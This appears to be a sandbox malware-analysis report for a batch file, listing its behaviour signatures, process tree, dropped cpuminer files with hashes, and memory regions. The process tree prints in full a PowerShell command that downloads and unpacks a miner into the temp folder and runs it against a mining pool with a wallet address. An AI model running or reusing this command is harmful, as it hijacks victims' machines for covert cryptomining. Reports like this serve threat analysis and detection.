b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1798s
max time network
1806s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2024, 02:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2164	powershell.exe
10	2164	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5044	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5044	cpuminer-sse2.exe
5044	cpuminer-sse2.exe
5044	cpuminer-sse2.exe
5044	cpuminer-sse2.exe
5044	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2164	powershell.exe
2164	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3692 wrote to memory of 2164	3692	cmd.exe	85
PID 3692 wrote to memory of 2164	3692	cmd.exe	85
PID 2164 wrote to memory of 4952	2164	powershell.exe	94
PID 2164 wrote to memory of 4952	2164	powershell.exe	94
PID 4952 wrote to memory of 5044	4952	cmd.exe	96
PID 4952 wrote to memory of 5044	4952	cmd.exe	96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5044

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2u1y2gt.sfw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
2.1MB

MD5
98b6a42c5677a4adcd88ba67e6d14250

SHA1
2720c3b0ce43457b5666c050384fc58d9398f25a

SHA256
c56efa661f72c01766d3903a201378c2124924254a4ee8c32553ccfc31acc06f

SHA512
fe7b04f3780371e58070902eb70f94745a3dc96095fc9d5c84a18f72b93ba9469a245c3cd288fa35f0bdbf078f7e6c05328ff5983b5331ec8ee08d67fdab4297

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
2.7MB

MD5
19e9367b1fc1c77d33d9ccbc41f628e5

SHA1
99f99a62943b25889918e84db3ec85e4044a0ad6

SHA256
85ab371c500aa171945631395d1d001029171477544c15a800a14cde19ecaef4

SHA512
343b32c3001268a5b285279007d0e4130f43e0bac963018640cf3abac42c0078348a760799486cb536910e0f9667e858cac5c9ab6d87ef33826c6f42d1dde869

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
2.6MB

MD5
402834b0acf014cc327ac5801babc496

SHA1
513c8623e32650b562e5444c009baa0b0a7f6e8d

SHA256
e58ac0058d936c21e1df456b448c317888339d42d933bca85400b6961dca6489

SHA512
6f1fb4451bee2f542eee676c0e95a9717702c768671131c9eac047328c5a40d521a6d54c15a29a0c6ee9f3f2c2ce0cc9fd3d63e7408a8e198662cffb76026167

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
3.1MB

MD5
abdb053f5c1828d620a6282b605be98b

SHA1
b8a227d2870bcd333a1d05c6bfca5b80046169bc

SHA256
3e5defd584580725636be7bed54d8d786ecf73361a6bdb3b7f3688a6ce848ce4

SHA512
7cd9fcab01b25eff830699f9bd4e4c12998ade9023279d5d0313f46dc6e54f333aadecc69f62b9d19a4be9ce3d77e73de2a9c2653713ee4fda7fb694002f701f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2164-17-0x00000278F7BE0000-0x00000278F7BEA000-memory.dmp

Filesize
40KB

Download
memory/2164-55-0x00007FFC0A680000-0x00007FFC0B141000-memory.dmp

Filesize
10.8MB

Download
memory/2164-16-0x00000278F7C00000-0x00000278F7C12000-memory.dmp

Filesize
72KB

Download
memory/2164-14-0x00007FFC0A680000-0x00007FFC0B141000-memory.dmp

Filesize
10.8MB

Download
memory/2164-13-0x00000278F6DF0000-0x00000278F6E00000-memory.dmp

Filesize
64KB

Download
memory/2164-12-0x00000278F6DF0000-0x00000278F6E00000-memory.dmp

Filesize
64KB

Download
memory/2164-11-0x00000278F6DF0000-0x00000278F6E00000-memory.dmp

Filesize
64KB

Download
memory/2164-10-0x00007FFC0A680000-0x00007FFC0B141000-memory.dmp

Filesize
10.8MB

Download
memory/2164-5-0x00000278F7720000-0x00000278F7742000-memory.dmp

Filesize
136KB

Download
memory/5044-71-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5044-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-70-0x0000000066B50000-0x0000000066BE8000-memory.dmp

Filesize
608KB

Download
memory/5044-72-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5044-73-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-69-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5044-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-98-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-103-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5044-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download